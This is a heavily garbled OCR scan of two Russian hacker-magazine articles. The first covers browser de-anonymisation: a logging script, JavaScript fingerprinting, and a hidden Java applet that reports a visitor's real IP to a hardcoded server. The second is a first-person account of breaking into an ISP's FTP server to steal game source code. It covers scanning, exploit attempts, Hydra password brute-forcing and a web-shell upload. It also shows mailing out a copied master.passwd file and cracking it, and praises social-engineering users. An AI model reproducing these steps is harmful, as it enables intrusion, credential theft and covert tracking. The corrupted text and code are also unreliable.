И НЕ ДОГАДЫВАЮТСЯ, ЧТО СУЩЕСТВУЕТ МНОЖЕСТ- 
ВО НЕСЛОЖНЫХ ПРИЕМОВ, ПОЗВОЛЯЮЩИХ ПОЛУ- 
ЧИТЬ ДОСТУП к ИНФОРМАЦИИ, КОТОРУЮ они ТАК 
ТЩАТЕЛЬНО СКРЫВАЮТ. УЗНАТЬ РЕАЛЬНЫЙ ІР, ПАРА- 
МЕТРЫ КОМПЬЮТЕРА, МЕСТОРАСПОЛОЖЕНИЕ ПОЛЬ- 
ЗОВАТЕЛЯ, ИСПОЛЬЗУЕМЫЙ РНОХѴ, — НИКАКИХ 
ПРОБЛЕМ! СЕЙЧАС Я НАУЧУ ТЕБЯ ОСНОВАМ ЭЛЕКТ- 
РОННОГО ШПИОНАЖА. I Докучаев Дмитрий ака РогЬ (ЬгЬ@геа1.хакер.ги) 



Узнай, что ты рассказываешь 
о себе, работая в Сети 

[большой брат] Методы защиты от посторонних глаз бывают разными. 
Самый примитивный способ — использовать при работе в Сети ргоху-сер- 
вера. Однако ни для кого не секрет, что не все проксики обеспечивают сво- 
им клиентам анонимность. Некоторые из них светят реальный ІР в дирек- 
тиве Х_РОН\Л/АРЮЕО_РОР, другие пишут подробные логи, которые по пер- 
вому запросу из МВД попадут на стол к Петру Васильевичу с тремя звез- 
дочками на погонах. На практике оказывается, что все сервера, информа- 
ция о которых публично доступна, — настоящее палево и пользоваться ими 
не следует. Конечно, вместо левого проксика можно заюзать быстрый 
соке, поднять туннель или ѴРН. Однако даже сидя под тремя ѴРМ-соедине- 
ниями, взломщика можно вычислить. Делается это о применением техно- 
логий ѵѵеЬ-шпионажа. Ты никогда не посещал ресурсы, где тебе предлага- 
ют провериться на анонимность? Уверен, что посещал. Подобные техноло- 
гии позволят узнать, насколько совершенна твоя безопасность. И обычно 
после тестирования пользователь видит большие изъяны в анонимности. 
РІастало время поговорить о работе подобных скриптов тестирования. 



I КАК КОМПИЛИРОВАТЬ иАѴА-ПРИЛОЖЕНИЯ? I 

Резонный вопрос :). На самом деле, программирование на Оаѵа 
чрезвычайно увлекательная штука, поэтому установить себе комп- 
лект і-разработчика нужно даже просто из здорового интереса. 
Первым делом зайди на Шр'У/іаѵа.5ип.сот/і25е/1.4.2/сІо\/ѵпІоас1.НІтІ 
и убедись в том, что ^аѵа ЗОК весит больше ста метров. Затем 
открой наш диск и установи ЗОК оттуда. В директории, куда ты ус- 
тановил ^аѵа, будет несколько каталогов и файлов, но все основ- 
ные утилиты, которые потребуются тебе, находятся в \Ьіп. Все ис- 
ходники собираются при помощи компилятора іаѵас.ехе: 
іаѵас зоигсе.іаѵа 

Выполнить готовый байт-код можно, запустив машину іаѵа.ехе 
и передав в качестве параметра имя выполняемого файла: 

іаѵа Ьуіе.іаѵа 

В нашем случае мы имеем дело с апплетами и их нужно за- 
пускать либо при помощи арріеіѵіеѵѵег, либо напрямую при по- 
мощи браузера. Для этого необходимо создать ІтітІ-файл со 
следующим содержимым: 



<арріе1 сосіе = "(е" »і(йіі=500 !іеід!іІ=500> 

</аррІеІ> 

Здесь вместо <<(е» нужно поставить имя файла с байт-кодом, 
причем расширение можно опустить. 




ботпіоасі-страница Раѵа ЗОК 






[коварные переменные] 

Почти все браузеры при обра- 
щении к ѵѵеЬ-сервису передают 
в запросе массу любопытной 
информации о клиенте, которая 
имеет посредственное отноше- 
ние к запрашиваемому доку- 
менту. В самом деле, абсолютно 
все современные обозреватели, 
помимо обязательных полей, 
определяемых спецификацией 
НТТР, передают кучу необяза- 
тельных данных в полях, вроде 
НЕМОТЕ_АООН и НТТР_иЗЕР!_ 
АОЕМТ. Разумеется, если для 
ѵѵеЬ-серфинга ты используешь 
ІеІпеТехе, то никаких дроблем у 
тебя не возникнет: ѲЕТ /(ІІе.МтІ 
и никакого палева. А вот если 
ты предпочитаешь ІЕ, то стоит задуматься над проблемой. Ведь передавае- 
мая ѵѵеЬ-серверу информация может быть проигнорирована, а может быть и 
записана в лог-файл, генерируемый специальным сценарием. Скрипт может 
вызываться как через 331, так и любым другим способом. В шпионском сце- 
нарии не будет замороченного кода, он просто запишет важные сведения о 
клиенте. Например, таким образом: 




СПИСОК анонимных проксиков, большая 
часть из которых — настоящее палево 



[шпионский код для создания логов] 



#!/и$г/Ьіп/регІ 

ргіпі "СопІепМуре: 1ех1/Мт1\п\п"; 
ореп(Шй, ”»/ѵаг/Іод/сІіепІз”); 

ргіт то "СІІеШ; $ЕМѴ|РІЕМ0ТЕ_А00В1, $ЕNV|НТТР_^8ЕР_А^ЕNТ1, 
$ЕNV{НТТР_РIЕЕЕРЕРI1\п"; 

ргіт те Тгоху: $ЕМѴ{НТТР_Е0РѴѴАР!0Е0_Е0РІ) $ЕМѴ{НТТР_ѴІА)\п"; 
сІозе(тѲ); 



записываются две переменные: Х_РОН\Л/АР!ОЕВ_РОН и НТТР_ѴІА. В случае, 
если пользователь юзает обычный прокси-сервер, в первой переменной нахо- 
дится его родной ІР-адрес, а во второй — айпишник и порт, на котором распо- 
ложен проксик. Причем даже в случае полной анонимности прокси-сервера, пе- 
ременная НТТР_ѴІА может быть не пустой. Очень важно проверить это, преж- 
де чем использовать ргоху в незаконных целях. Некоторые электронные ресур- 
сы просто не обслуживают клиентов, которые посещают сайт через прокси. 

иаѵавсгірі — враг народа] Ты никогда не задумывался, почему многие 
пользователи не доверяют ЗаѵаЗсгірІ-приложениям и выключают поддерж- 
ку этой технологии в своих браузерах? На самом деле с помощью 
ЗаѵаЗсгірІ можно утащить некоторые конфиденциальные сведения о маши- 
не пользователя. Я расскажу, например, о том, как узнать максимальное и 
текущее разрешение экрана, время, а также тип процессора: 

<зсгірІ Іапдиаде="]аѵазсгірІ"> 

сіоситепі.ѵугііе ("Уои аге изіпд: " + паѵіда^о^.аррNате) 

сіоситет.ѵугііе ("СРІІ Іуре: " + паѵідаІог.сриСІазз) 

сіоситеш.ѵѵгііе ("Зсгееп Везоіиііоп: " -г зсгееп.\л/ісІІ(і + "х" + 

зсгееп.Ііеідт) 

сіоситепі.ѵѵгііе ("АѵаіІаЫе Зсгееп Везоіиііоп: " + зсгееп.аѵаіІѴѴІсШі + "х” 
+ зсгееп.аѵаіІНеідт) 

сіоситет.ѵугііе ("Зсгееп Соіог ОерІІг " -г зсгееп. соІогОерІІі) 

Іосіау = пеѵу 0а1е() 

сІоситеп1.ѵѵгіІеІп("ОаІе & Ііте оп уоиг сотриіег апй Ііте іопе із: " + 
Іосіау) 

сІоситепІ.ѵѵгіІеІпС'ОаІе & Ііте іп уоиг Іосаіе Іогтаі: " + 
ІосІау.ІоЕосаІеЗІгіпдО) 

</зсгірІ> 



в данном примере четко и ясно называется имя браузера, а также приводит- 
ся максимально возможное, текущее разрешение экрана и локальное время. 
Согласись, неприятно, когда подобная инфа сохраняется в чьем-то логе. Осо- 
бенно это касается времени: ведь по часовому поясу можно легко определить 
страну и легко вычислить местоположение нарушителя сетевого порядка. 



Что делает этот сценарий? В первой его части происходит легирование ба- 
зовых переменных окружения: ІР-адреса клиента, информации о браузере, 
а также ЕІНЕ'а, откуда посетитель пришел на данную страницу. Казалось 
бы, что тут такого? На самом деле, с помощью подобного журналирования 
можно узнать массу полезной информации о пользователе. В частности, по 
такому логу можно легко определить, из какой страны юзер и какая у него 
операционная система. Не веришь? Зря, приятель. При составлении запро- 
са твой браузер записывает в поле Узег-Адепі строку следующего вида: 



Мо2ІІІа/4.0 (сотраІІЫе; М8ІЕ 6.0; ѴѴІпОоѵѵз N1 5.1; ги) 



Легко видеть, что в данном случае у пользователя установлена ѴѴІпХР, а так- 
же шестой ІЕ. Помимо этого в строке агента отчетливо виден русский язык. 
Если какой-нибудь кардер о подобным НТТР_иЗЕН_АОЕНТ'ом попробует 
провести незаконную транзакцию, то он будет легко вычислен антифродом. 
Смотрим далее. Переменная НТТР_РЕРЕРЕВ также может выдать взлом- 
щика с потрохами. Если скрипт залогирует, что якобы американский кард- 
холдер зашел в инет-магазин с сайта таИ.ги, то у службы безопасности е- 
шопа возникнет очень много вопросов. 

И, наконец, пришло время поговорить об ІР-адресе. Если юзер будет ис- 
пользовать прокси, то в переменную РЕМОТЕ_АООН запишется айпишник 
проксика. Но не стоит радоваться раньше времени. Способы обнаружения 
прокси-серверов есть и активно применяются на многих порталах (напри- 
мер, на том же Яндексе). 

Обрати внимание на шестую строчку скрипта, который я приводил выше. Там 
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иаѵа — источник зла] Но иаѵаЗсгірІ может нанести копеечный урон по 
сравнению с тем, на что способна дочка Зип Міегозузіетз — иаѵа. Если ты 
до сих пор разрешаешь загрузку любых ява-апплетов, то тебе стоит заду- 
маться над собственной безопасностью. Ведь существуют достаточно 
простые наработки, позволяющие узнать твой реальный ІР-адрес, даже ес- 
ли ты работаешь через цепочку зоскз-серверов. 

На самом деле, механизм определения айпишника прост до безумия. Реа- 
лизовать этот прием тебе не помешает даже тот факт, что ты ничего не 
смыслишь в программировании на иаѵа :). Основная идея заключается в 
том, чтобы включить в страницу шпионского сайта невидимый апплет, ко- 
торый, при помощи стандартного сетевого компонента іаѵа.пеі, создаст со- 
кет о твоим узлом и вызовет выполнение скрипта, который запишет в лог 
ІР-адрес клиента. 

Совершенно понятно, что это будет именно реальный ІР-адрес, поскольку 
байт-код )аѵа-приложения выполняется виртуальной машиной и, разумеет- 
ся, подключение будет реализовано напрямую, без использования прокси- 
ков, указанных в настройках браузера. 

Такой фокус вполне можно использовать даже для организации антифро- 
довой системы. Представим на секунду, будто бы негодяй — взломщик пы- 
тается обмануть на пару тысяч долларов американский интернет-магазин. 
Как полагается, он заходит через цепочку зоскз-серверов на сайт е-шопа и 
приступает к своему черному делу. В процессе вбивания левых данных наш 
герой не обращает внимание, что на одной из страниц загрузился невиди- 
мый )аѵа-апплет, который и выдал админам всю информацию о его реаль- 
ном ІР. Помимо этого трюка, с помощью стандартных методов )аѵа, вполне 
реально узнать и ір-адрес локального интерфейса клиента. 

Скажем, если пользователь работает в локальной сети и сидит в инете через 




самопальный чекер переменных окружения 



исходник хакерского апплета 
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I ПРОВЕРКА НА ВШИВОСТЬ I 

Ниже я приведу известные сайты для проверки ѵѵеЬ-аноним- 
ности. Обязательно посети их все, так как эти ресурсы допол- 
няют друг друга. 

Ш Шр://ІеасІег.ги/зесиге/ѵѵІіо.МтІ 

Этот сценарий позволяет оценить общую сетевую анонимность. 
Здесь тебе напишется текущий ІР-адрес, версия браузера, его 
модификация (если есть), изег-адепі, операционная система, на- 
личие прокси-сервера и число проксиков в цепочке. Помимо это- 
го здесь можно увидеть хост и порт последнего прокси и его поч- 
товый сервер. Во второй части проверки ты получишь текущее и 
максимально возможное разрешение экрана, статус работы 
^аѵа/^аѵа8с^ір1/VЬ8с^ір(, время и много других интересных вещей. 
Ш Шр://зІіасІоѵѵзесипіу.пе1.иа/г/сІіескіпд.зМтІ 
Трехстадийная проверка на наличие прокси-серверов. Этот 
сценарий анализирует текущий ргоху, и если он есть - деталь- 
но вырисовывает сведения о нем. Далее он предлагает прове- 
рить произвольный прокси на анонимность, а на третьем шаге 
дает полные сведения о каждой переменной окружения. Так- 
же можно встретить рекомендации по безопасности и моди- 
фикации епѵ-переменных. 

[з] ѵѵѵѵт.зііШізіепег.асІсІг.сот/сІіѳскроіпіІ 
Еще более детальная проверка анонимности. Здесь, помимо 
переменных СѲІ, можно оценить прокси по 5-балльной шкале, 
а также пройти тесты со шпионскими ^аѵа-приложениями, ко- 
торые попытаются узнать твой реальный адрес, интрасетевой 
ІР, а также локальное время. 




проверка на Лидере 
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еще один незамысловатый тест 




ргоху для Заѵа - не помеха! I вызов ]аѵа-апплета 



NАТ, то при помощи первого способа ты получишь внешний ір его шлюза. Но 
оказывается, что возможно получить и адрес локального интерфейса: дела- 
ется это при помощи стандартного метода ІпеІАсІсІгезз.деЩосаІНоз1(). 

Чтобы не быть голословным, я приведу пример кода, который подключает- 
ся напрямую к \л/еЬ-серверу и выполняет там СѲІ-сценарий, передавая ему 
в качестве параметра адрес локального интерфейса и имя компьютера: 

[іаѵа-апплет ДЛЯ определения реального ІР] 

ітрогі Іаѵа.аррІеІ.АррІеІ; 

ітрогі Іаѵа.аѵуі.*; 

ітрогі Іаѵа.іо.*; 

ітрогі Іаѵа.пеі.*; 

риЫіс сіазз 1е ехіепсіз Арріеі { 

Зоскеі зоск; 

ОаІаІприІЗІгеат іп; 

Зігіпд гез; 

ІпеІАсІсІгезз І_ір; 

Зігіпд з_ір; 
риЫіс ѵоісі Іпі1() { 

Ігу I 

І_ір = Іпе1АсІсІгезз.де11осаІНоз1(); 

5_ір=Мр.1о31гіпд(); 

Зоскеі зоск = пе\л/ Зоске1("21 7.1 0.40.71", 80); 

РгіпІЗІгеат ргіпізігеат = пе\л/ Ргіп131геат(зоск.деіОи1ри131геат()); 

ргіпІ5Ігеат.ргіп1Іп(”6ЕТ /зсгір1.рІ?ір=" + з_ір + '\п\г\п\г“); 

іп = пеѵѵ Оа1аІпри131геат(зоск.де1ІприіЗігеат()); 

гез = іп.геасіипеО; 

ргіпізігеат. сІозе(); 

зоск.сІозеО; 

) саІсИ (ІОЕхсерІіоп е) II 

11 

[защити себя сам] Надеюсь, я убедил тебя, что при большом желании и 
некотором везении через браузер можно узнать почти все, что так тща- 
тельно скрывают пользователи: реальный ІР, адрес локального устройства, 
системные параметры, часовой пояс и локализацию системы. Но если вов- 
ремя подумать о защите, то можно легко обломать всех этих шпионов. 
Во-первых, необходимо отключить Даѵа и ааѵаВогірІ. В случае исполь- 
зования Іпіегпеі Ехріогег, это можно сделать в дополнительных свой- 
ствах обозревателя. Но ослик по определению является очень упря- 
мым браузером, поэтому не факт, что поддержка языков деактивиру- 
ется. Для проверки рекомендую написать небольшой НТМЬ-файл сле- 
дующего содержания: 

<зсгір1 Іапдиаде="4аѵаЗсгірГ> 

<І-сІоситеп1.\л/гі1е ("<4аѵаЗсгір1 із епаЫесІ апсі \л/огкіпд.”)-> 

<позсгір1> 

<1і1>АІІ сіопе 
</П05СГІр1> 

</зсгір1> 

в данном фрагменте символика <! > означает, что вложенные строки 

выполнятся лишь в случае, когда использование ааѵаЗогірІ (или любого 
другого языка, объявленного выше) включено. Если все нормально, будет 
выполнен вложенный код тегов <позсгір(></позогір(>, содержание которых 
объявит о нормальной защите. 

Но самое сложное — это выключить поддержку ааѵа. Если у тебя на компь- 
ютере стоит 80К, то не факт, что одной галочкой ты сможешь выключить 
поддержку в ІЕ. В связи о этим в интернете есть очень много программ, 
противостоящих загрузке ааѵа-апплетов. Советую поискать подобные ве- 
щи и выбрать для себя лучший софт. 

Отмечу также, что порождение прямых ааѵа-сокетов можно запретить о по- 
мощью любого файрвола. Достаточно настроить брандмауэр так, чтобы он 
спрашивал о допуске приложения в Сеть @ 











ЮНИТЫ КРЕАТИФФ КОДИНГ УМІХОІО СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20МЕ РЕРРУМ НЬЮСЫ 



Угнанные сорцы 

ГОДА ПОЛТОРА НАЗАД МИР ОШАРАШИЛА НОВОСТЬ 
О ТОМ, ЧТО ИСХОДНЫЕ КОДЫ САМОГО ОЖИДАЕМО- 
ГО ШУТЕРА 2004 ГОДА — НАЕР-ЫРЕ 2 — БЫЛИ ПОХИ- 
ЩЕНЫ. НЕИЗВЕСТНОГО ХАКЕРА МАТЕРИЛИ НА ЧЕМ 
СВЕТ СТОИТ. ЕЩЕ БЫ — ВЫХОД ИГРУШКИ ОТЛОЖИ- 
ЛИ НА НЕОПРЕДЕЛЕННЫЙ СРОК. МАТЕРИЛИ-ТО МА- 
ТЕРИЛИ, А УКРАДЕННУЮ ПИРАТСКУЮ ВЕРСИЮ НА 
ПРИЛАВКИ ПОБЕЖАЛИ ПОКУПАТЬ ВСЕ :). Я ЕЩЕ ТОГ- 
ДА ЗАУВАЖАЛ НЕИЗВЕСТНОГО ВЗЛОМЩИКА: ПРО- 
НИКНУТЬ В ѴАЕѴЕ И СТЯНУТЬ ТАКУЮ ЦЕННУЮ ИГРУ 
— ЭТО ДЕЙСТВИТЕЛЬНО ВЫСШИЙ ПИЛОТАЖ. В ТОТ 
МОМЕНТ Я ЕЩЕ И ПРЕДПОЛОЖИТЬ НЕ МОГ, ЧТО МНЕ 
ПРИДЕТСЯ ОКАЗАТЬСЯ В ЕГО ШКУРЕ И ПОХИТИТЬ 
СОРЦЫ ОДНОЙ ИЗ ЛУЧШЕЙ ОНЛАЙН ПРО НАШИХ 

дней I Александр Любимов ака Зазііікз ( геа!_5зМх@таіІ.ги ) 



Документированная история 
похищения исходных кодов ОпІіпе-ВРѲ 

[Ьгіеііпд] Как-то ночью, когда я по обыкновению сидел в ІРС, ко мне в при- 
ват постучал один из постояльцев канала. Парень попросил помочь, дал 
ссылку на ресурс Шр://іір.аЬз.пеі и поведал мне захватывающую историю. 
Оказалось, что он собирает онлайн игрушки для своего локального сетево- 
го игрового сервера, это его хобби. Но проблема в том, что он уже больше 
полугода пытается заполучить исходники одной очень популярной Опііпе 
РРО (я умышленно не буду упоминать ее название из личных соображе- 
ний). В интернете ее сорцы найти невозможно, но мой собеседник сообщил 
мне по секрету, что не так давно игра была взломана, и хакеры успели по- 
хитить драгоценный зоигсе-код. Всего было сделано несколько копий цен- 
ного исходника, в спешке архивы с ним были разбросаны на разные (1р- 
серверы по всему миру, где и хранились некоторое время. Но когда к ис- 
ходникам захотели обратиться, оказалось, что (1р-хранилища в дауне и 
ценный груз исчез вместе с ними. 

Во всей Сети осталась лишь одна машина, на которой до сих пор в нетро- 
нутом виде лежат заветные коды этой онлайновой игрушки. Причем, как я 
выяснил позже, владельцы хоста не знали, какой ценный груз залили им в 
иріоаб. Собственно, мне и предстояло, каким угодно способом, пробраться 
на Пр.аЬз.пеІ, получить доступ к системе и слить исходные коды — ни боль- 
ше ни меньше. В том случае, если я доставлю заказчику коды, он собира- 
ет игру и объясняет, как привести ее в рабочее состояние. Кроме того, он 
предоставил мне на время взлома рутовый шелл на мощной площадке. Об- 
говорив все условия, я получил адреса двух серверов (основного и почто- 
вого), список потенциальных файлов, которые могли относиться к игрушке 
и одно единственное задание — любой ценой украсть исходники. 

[внешний периметр] Получив данные о целевых машинах, я приступил 
к активным действиям. Первым делом я завалился на выданный мне рут- 
шелл и просканировал жертву птар'ом: 

$ птар -зѴ -Р йр.аЬз.пеІ 

По 1 13 порту (ібепісі) и 22 (баннер ззб) выяснилось (даже без флага -О), что 
система крутится под РгееВЗО. Это не очень меня обрадовало, честно го- 
воря. На машине еще висел демон, отвечающий за МРЗ подключения. 
Структуру НРЗ я просмотрел следующим образом: 

$ зИоѵѵтоипІ -а РІр.аЬз.пеІ 
АН тоипі роіпіз оп РІр.аЬз.пеІ: 

207.1 14.0.71 :/диез1 
таіІ1.аЬз.пе1:/диез1 
геІоасІ.сИагт.пеІ:/диезІ 

Здесь я вижу имена машин и каталоги, которые они монтируют (точка мон- 
тирования обычно совпадает о именем каталога). Таким образом, я увидел, 
что, как минимум, три компа экспортируют /диезі каталог с основной маши- 
ны. Но кроме таіИ.аЬз.пеІ (мыльный сервант) ни одна из тачек не отвеча- 
ла на пинги, поэтому будем считать их мертвыми. Выполнив зІю\л/тоипІ -е 
Пр.аЬз.пеІ, я получил список файловых систем и хостов, которые имеют 
право их маунтить: 

/диезі 207.114.0.132 207.114.0.75 




ствовал. Однако смею заве- 
рить тебя: каждый хоть раз 
в жизни слышал о ней, 
а каждый десятый — играл. 






На нашем диске 
ты найдешь полные 
версии программ, 
описанных в этой статье. 
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недоступный 




разведка птар'ом 



Ладно, поехали дальше — посмотрим, что там интересного написал птар про сервер. 
Что меня действительно удивило при просмотре баннеров, так это то, что на основной 
машине (Пр.аЬз.пеГ) был запущен ІеІпеМ, что, в общем-то, странно, ведь практически 
все перешли уже давно на безопасный взИ. Я вспомнил про ГеІпеМ сплоит от ТЕЗО, по- 
ражающий демон на РгееВЗО 4.Х и МеІВЗО. Скачав себе исходник {ттт.раскеізіогт- 
зесипіу.огд/0109-ехрІоИв/7350854.с) и собрав его, я натравил отмычку на йр. К слову, 
бинарник желательно запускать на машине с быстрым каналом — для полноценного 
эксплуатирования он отсылает целевому демону 16 МЬ трафика, что само по себе не 
мало и на тормознутом диалапе может занять несколько часов. 

Отправив нужный объем данных, сплоит умолк — видимо, что-то пошло не так. Я поп- 
робовал запустить его еще раз — эффекта не последовало. Далее я залогинился под 
анонимом на Яр-узел. Папок в хранилище было много, а необходимые мне файлы лежа- 
ли в іпсотіпд. Так близко и так далеко одновременно. 

Все дело в том, что аплоад в іпсотіпд, как и положено, разрешался всем, но окачивать 



файлы оттуда было нельзя. То есть, если ты залил туда инфу, 
обратно выдрать оттуда ее не сможешь (именно поэтому дос- 
тать исходники извне было невозможно). И где-то среди все- 
го мусора в іпсотіпд лежали куски кода игрушки, которые 
мне, собственно, и предстояло достать. Мне пришла идея 
воспользоваться другой отмычкой, на этот раз под баг в Ярб 
(ѵѵѵѵѵѵ.ѵѵеЬ-Ііаск.ги/ехрІоіі/зоигсе/Іигкеу2.с), благо анонимный 
доступ на фтп был, и запись в іпсотіпд была разрешена. 

Но этот сплоит, как я и ожидал, не принес никаких положитель- 
ных результатов. Значит, теперь пришло время исследовать 
ѵѵеЬ. При заходе на главную страничку меня встретил мрачным 
тоном дизайн (хотя о другой стороны не повесят же они баннер 
со смайлами и лозунгом «Ломайте нас!» :). С энтузиазмом по- 
тыкав по ссылкам в поисках рітр/сді скриптов, я жестко обло- 
мался — весь контент сайта был выполнен в чистом Іііті. 

Хотя все же немного ценной информации о сервере я выудил. 
Оказывается, машина (и, собственно, вся сеть с этой маской) 
принадлежала американцам. АВЗпеІ предлагал услуги широ- 
кополосного и модемного доступа в интернет, а также нес- 
колько других сервисов. Среди них — хостинг пользовательс- 
ких ѵѵеЬ-страничек. Проследовав по линку, я увидел список 
пользователей и их сайтов (т\л/ѵ\/.аЬз.пеІ/~и$ег). Хотя был и 
свой прикол — юзерам разрешалось заливать только страни- 
цы с расширением *.Мт и *.И(т1, то есть подразумевалось, что 
никаких скриптов юзеры выполнять не могли. Я уже думал 
плюнуть на это дело и забыть про чертовы исходники, но что- 
то меня подтолкнуло идти дальше. Суди сам, если есть юзерс- 
кие странички, значит, в системе прописан соответствующий 
аккаунт изег (не важно, имеет ли он зіт или просто Яр-доступ). 
То есть, если я соберу список всех пользователей со страни- 
цы и запишу их, то можно попытаться подобрать пароль одно- 
го из них. Чтобы не выдирать логины вручную, я сохранил веб- 
страницу себе на винт и написал вот такой вот скрипт на Регі: 

[скрипт ДЛЯ сбора списка пользователей] 

#!/изг/Ьіп/регІ 

ореп(РІІЕ,$АВѲѴ[0]);# $АВѲѴ[0] в данном случае это 
ІИтІ-страница с логинами. 

\л/Ы1е(<Р11Е>){ 

ІІ($_=~т/\ллллл/.аЬз.пеМ~/){ 

($а,$Ь)=зрІІІ("~",$_); 

($а,$Ь)=зрІІІ(7",$Ь); 
ргіпі "$а \п”;1 
1 

сІозе(РІЕЕ); 

Как только сценарий вывел мне все логины, я записал их и пере- 
направил на свой шелл. Осталось придумать, какой бы словарь 
заюзать для перебора. И тут я вспомнил про словарик, который 
прилагается к Вгиіиз'у (тѵѵѵмеЬ-Ііаск.ш/сІоѵѵпІоасІ/іп(о.рІір?до=12) 
— самое оно: небольшой, но вмещает самые часто употребляе- 
мые слова. Загружаем любимую Г идру, и вперед: 

$ Ітубга -Е Іодіпз.іхі -Р Ьгиіиз.іхі -1 -V -о Іод.М аЬз.пеІ Яр & 

На экране быстро замелькали строчки, свидетельствующие 
о том, что процесс подбора идет успешно. Мне в это время ос- 
тавалось только ждать и надеяться. И через некоторое время 
заветная комбинация все-таки подобралась: сіігізз:ріг 2 а. 

[атака на ѴѴЕВ] Демон пустил меня на Яр под обрученным 
аккаунтом. В каталоге любителя пицц не было ничего интерес- 



I НЕПРИСТУПНАЯ РРЕЕВЗО I 

К слову о забугорных сисадминах. Как ты, 
наверное, заметил, основная часть насе- 
ления свободного континента не особо за- 
думывается над сложностью своих паро- 
лей. Именно поэтому Джонник так шустро 
раскалывает хэши американскиз юзверей. 
Да, действительно, от сакраметнального 
боб, Еоѵе, Зех они отучились, но пассы не 



стали с тех времен намного сложнее ;). 
Кроме того они довольно наивны, и если 
ты знаешь английский язык то смело мо- 
жешь пробовать себя в роли социального 
инженера. Мой знакомый Робин из штатов 
разводит многих юзеров своего ІЗР на па- 
роли и другую конфеденциальною инфу, 
предствляясь либо сисадмином, либо сот- 
рудником службы техподдержки. И у него 



это прекрасно выходит! Меньше чем за 
час он может развести около 5 человек. 
Конечно америкосам до недоверчивых 
славян еще очень далеко ;). Хотя, это не 
касается сотруднкиов ІТ сферы. Админа 
будет очень тяжело развести, потому что 
это люди твердо знающие свое дело. 
Впрочем, у всех свои слабости, поэтому 
нет ничего невозможно в этой жизни ;) 







ного, только лишь стандартные конфиги. Это заставило заду- 
маться — возможно, удастся подцепиться на (еІпеМ под этим 
же аккаунтом. Но не тут-то было — вместо шелла у Кристофе- 
ра стояп /Ып/развѵѵсІ. Вернувшись на фтп я заметил одну инте- 
ресную особенность — я мог подниматься на сколько угодно 
каталогов выше, то есть мне была доступна для просмотра 
вся файловая система машины, а не только каталог сИгізз'а. Я 
начал потихоньку изучать содержание винчестера, но, к сожа- 
лению, самые интересные папки были закрыты для просмот- 
ра. Зато /гооі мог просмотреть каждый, что было, мягко гово- 
ря, странно. Впрочем, в рутовском каталоге не было ничего 
такого, что могло бы мне помочь получить аккаунт в системе. 
Можно попробовать залить шелл (хотя юзерам и запрещалось 
аплоадить файлы с расширением, отличным от '.Ітігпі, это еще 
не означало, что скрипты не будут выполняться). Я визуально 
убедился, что регі и рбр установлены и загрузил на сервер 
шелл г57рѵѵз.рІ. На всякий случай, я создал каталог сді-Ьіп (как 
настроен веб-сервер точно я не знал) и, поставив соответству- 
ющие права, скопировал сценарий в эту папку. Но, обратив- 
шись браузером к ѵѵѵт.аЬз.пеі/~сІігі$$/сді-Ып/г57рѵ[/$.рІ, я уви- 
дел только исходный текст сценария. Не помогло даже переи- 
менование *.р1 в *.сді. На самом деле в этом не было ничего 
удивительного и мало меня расстроило, я решил попробовать 
провернуть тоже самое для рітр, но опять обломался :(. 

Я призадумался. Теперь все, что мне оставалось — бродить по 
той части файловой системы, к которой я имею доступ. Посмот- 
рев /еіс/раззмс! я понял, что в системе порядочное количество 
пользователей, и поэтому решено было опять заняться перебо- 
ром паролей. На этот раз мне нужны были аккаунты только с ва- 
лидным шеллом. В Сети очень много утилит для выдирания и за- 
писи в файл логинов из раззѵѵб, поэтому проблемы в выборе не 
было (я юзал сотЬо.рІ). Получив список логинов, я скормил его 
гидре и решил брутить (еІпеМ (иногда пароли для логина на йр и 
ІеІпеѴззІі могут различаться). Оторвавшись для небольшого пере- 
кура, я отошел от компа. Когда я вернулся, перебор все еще про- 
должался, что, собственно, не сильно радовало. Но внезапно гос- 
пожа Удача улыбнулась мне, и я получил рабочий логин одного из 
юзеров о доступом к ЬазИ. Первый шаг к взлому был сделан. 
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админские секреты 



[близнецы] Я решил выяснить, работает ли сейчас в системе 
кто-то, кроме меня. Утилита ѵѵіто показала, что я сейчас только 
один, и можно было спокойно продолжать исследование маши- 
ны без опаски быть замеченным. На тачке была установлена 
РгееВЗО 4.11, поэтому вариант поднять права локально с по- 
мощью сплоита отпадал сразу же, так как в паблике никаких 
подходящий сплоитов не было, а взять приватный стафф у ме- 
ня не было возможности. Если ты помнишь, то хэшированью 
пароли в В80 лежат в файле гпазіег.раззѵѵб, который, естест- 
венно, доступен только гооі'у. Но иногда администраторы копи- 
руют хэши в свой домашний каталог, чтобы править, либо дела- 
ют где-нибудь на винте запасную копию, чтобы (хотя бы частич- 
но) восстановить файл после сбоя. Я выполнил Іосаіе 
тазіег.раззѵѵб и увидел доступный для чтения файл в папке 
юзера \л/ІІІІІе. Судя по всему, это был один из членов обслужива- 
ющего персонала, потому что каталоги обычных непривилеги- 
рованных юзеров (которым в данный момент я и был) находи- 
лись в /диез1/1-ая_буква_логина/логин, что в принципе станда- 
ртно для большинства серверов, которые хостят пользова- 
тельские сайты. Я обрадовался подобной находке, и для даль- 
нейшего исследования паролей выполнил команду саі 
/раіи/іо/глазіег.раззѵѵгі I таіі ріІибіѲтаіІ.ги и проверил почту. 
Долго ждать не пришлось — в ящик сразу же свалилось пись- 
мо с хэшами юзверей! Скормив файл Рипперу, я немного при- 



задумался и посмотрел на дату файла. Последнее обращение к нему датировалось 2000 
годом, то есть больше 4-х лет назад, а поэтому особенно надеяться на расшифровку пас- 
сов не стоило. Выходит, что файл был бесполезным. И хотя больше, чем из 2-х тысяч учет- 
ных записей, Риппер расшифровал половину, пользы не было никакой. В действительнос- 
ти больше, чем половины юзеров уже не было, но загвоздка была даже не в этом. Основ- 
ная проблема заключалась в том, что я, как обычный юзер, не имел права даже читать 
Мр/іпсотіпд, где, напомню, хранились исходники, которые были мне нужны. 
Единственная группа пользователей, которая имела доступ к нужным мне файлам, назы- 
валась Прдгоир, но к ней принадлежало всего 5 человек, и что было самое грустное, — 
они были зибо'ерами. Почему грустное? Потому что, во-первых, их пароли даже в 4-х лет- 
нем раззтгі ни в какую не хотели расшифровываться (я параллельно запустил процесс 
на нескольких быстрых шеллах), а во-вторых, эти люди явно было не глупые и поиметь 
доступ к их файлам было бы весьма проблематично. Дальнейшие скитания по папкам в 
поисках каких-нибудь зацепок ни к чему толковому не привели, и на время я призадумал- 
ся. Мне почему-то захотелось проверить валидность юзаемого мной аккаунта на втором, 
почтовом сервере. 8з1т почему-то не прокатил, но на фтп меня все-таки впустили. Вот те- 
перь я имел возможность просматривать дерево каталогов обеих машин. Перейдя в ко- 
